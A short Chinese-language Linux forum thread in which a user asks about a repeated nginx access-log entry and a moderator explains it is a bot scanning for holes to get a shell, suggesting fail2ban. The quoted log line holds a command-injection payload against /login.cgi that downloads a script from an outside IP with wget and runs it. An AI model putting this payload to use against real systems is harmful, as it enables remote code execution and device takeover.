请问这是在做什么?

Web、Mail、Ftp、DNS、Proxy、VPN、Samba、LDAP 等基础网络服务
回复
drop
帖子: 14
注册时间: 2018-05-26 19:54

请问这是在做什么?

#1

帖子 drop » 2018-06-18 19:56

69.26.18.100 - - [18/Jun/2018:18:43:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.
190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HT
TP/1.1" 301 178 "-" "Hello, World"
nginx的access.log里从早到晚都是它的记录,已经好几天了,ip地址每次都不一样,已经禁了它的UA,但每天还是能看到它的记录,没事吧?该如何解决?
头像
astolia
论坛版主
帖子: 6398
注册时间: 2008-09-18 13:11

Re: 请问这是在做什么?

#2

帖子 astolia » 2018-06-19 22:08

bot在扫漏洞尝试拿shell而已 https://twitter.com/txalin/status/1007625620090707974
这种我一般都是用fail2ban封若干小时ip
回复